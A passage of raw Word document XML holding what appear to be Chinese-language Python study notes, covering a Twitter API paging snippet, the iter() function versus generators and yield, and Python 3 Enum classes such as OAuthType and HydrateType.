          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'code'</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>130</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>131</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5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t># Twitter service error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">                            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">raise </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>TwitterConnectionError</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(item)</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">yield </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>item</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            data = r.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>json</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5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t># CHECK FOR NEXT PAGE OR BAIL...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>if self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.api.version == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'1.1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A33A884" w14:textId="1DE4F44A" w:rsidR="00C7094E" w:rsidRDefault="00C7094E" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>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ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030D490F" w14:textId="77777777" w:rsidR="009D7568" w:rsidRDefault="009D7568" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D4761FA" w14:textId="77777777" w:rsidR="00624CE5" w:rsidRDefault="00624CE5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A3BF75F" w14:textId="6595A8D8" w:rsidR="00AD6773" w:rsidRDefault="007D0342" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="431" w:name="_Toc159779879"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>iter</w:t>
      </w:r>
      <w:r w:rsidR="00AD6773">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="431"/>
    </w:p>
    <w:p w14:paraId="51148555" w14:textId="77777777" w:rsidR="009D7568" w:rsidRDefault="009D7568" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37FBA70B" w14:textId="584F36BC" w:rsidR="006A4C66" w:rsidRDefault="006A4C66" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">iter() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数用来生成迭代器</w:t>
      </w:r>
      <w:r w:rsidR="007E7E08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="007E7E08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>iter</w:t>
      </w:r>
      <w:r w:rsidR="007E7E08">
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="007E7E08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和生成器</w:t>
      </w:r>
      <w:r w:rsidR="003B1D46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的区别还是很大的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D50E8D7" w14:textId="77777777" w:rsidR="003B1D46" w:rsidRDefault="003B1D46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13856359" w14:textId="42B54373" w:rsidR="003B1D46" w:rsidRDefault="003B1D46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>yield</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是用来</w:t>
      </w:r>
      <w:r w:rsidR="00EF7363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写在函数内部，使之成为可迭代对象的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6E3EC0" w14:textId="4110716B" w:rsidR="00EF7363" w:rsidRDefault="00EF7363" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>iter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作的，就是直接的可迭代对象，如列表、生成器对象等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C441987" w14:textId="77777777" w:rsidR="006A4C66" w:rsidRDefault="006A4C66" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B942349" w14:textId="77777777" w:rsidR="006A4C66" w:rsidRDefault="006A4C66" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D4978F" w14:textId="2D1AA028" w:rsidR="007D0342" w:rsidRDefault="006A4C66" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> iter() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法的语法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75096AED" w14:textId="0D5E8856" w:rsidR="008B3FBA" w:rsidRDefault="00915BA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00915BA2">
        <w:t>iter(object[, sentinel])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1930B52D" w14:textId="77777777" w:rsidR="008B3FBA" w:rsidRDefault="008B3FBA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69AEDA46" w14:textId="7EAE96C5" w:rsidR="004661F9" w:rsidRDefault="007A127B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007A127B">
        <w:t>lst = [1, 2, 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E82D56" w14:textId="130169F8" w:rsidR="004661F9" w:rsidRDefault="007A127B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007A127B">
        <w:t>for i in iter(lst):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3177A3A9" w14:textId="52995A2F" w:rsidR="007A127B" w:rsidRDefault="00A755F0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00AF3C14">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A755F0">
        <w:t>print(i)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DA46A5" w14:textId="77777777" w:rsidR="007A127B" w:rsidRDefault="007A127B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47951737" w14:textId="77777777" w:rsidR="00313AB4" w:rsidRDefault="00313AB4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00D124E8" w14:textId="35A7DAA6" w:rsidR="00313AB4" w:rsidRDefault="00313AB4" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="432" w:name="_Toc159779880"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>enum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="432"/>
    </w:p>
    <w:p w14:paraId="6F347F23" w14:textId="77777777" w:rsidR="00313AB4" w:rsidRDefault="00313AB4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47774B0B" w14:textId="4D491829" w:rsidR="00313AB4" w:rsidRDefault="00FD049C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的枚举类型：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3956F4CC" w14:textId="4595D581" w:rsidR="00313AB4" w:rsidRDefault="00821255" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不需要定义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t>_init__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:t>.xxxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，直接如下，继承</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Enum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型即可：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512364B7" w14:textId="77777777" w:rsidR="006B614F" w:rsidRDefault="006B614F" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">class </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="E5C07B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>OAuthType</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(Enum):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    OAUTH1 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'oAuth1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">OAUTH2 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'oAuth2'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">OAUTH2USER = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'oAuth2User'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">class </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="E5C07B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>HydrateType</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(Enum):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    NONE = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">APPEND = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">REPLACE = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5DED4C" w14:textId="77777777" w:rsidR="00FD049C" w:rsidRPr="006B614F" w:rsidRDefault="00FD049C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40E5B21A" w14:textId="5F41D79B" w:rsidR="00FD049C" w:rsidRDefault="006D5887" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用时直接当变量，直接使用就可以。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D915DA" w14:textId="77777777" w:rsidR="006D5887" w:rsidRDefault="006D5887" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>HydrateType.NONE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E82B97" w14:textId="77777777" w:rsidR="00FD049C" w:rsidRDefault="00FD049C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E1EAB22" w14:textId="77777777" w:rsidR="00FD049C" w:rsidRDefault="00FD049C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="186E26C5" w14:textId="77777777" w:rsidR="00FD049C" w:rsidRDefault="00FD049C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B676003" w14:textId="77777777" w:rsidR="00FD049C" w:rsidRDefault="00FD049C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
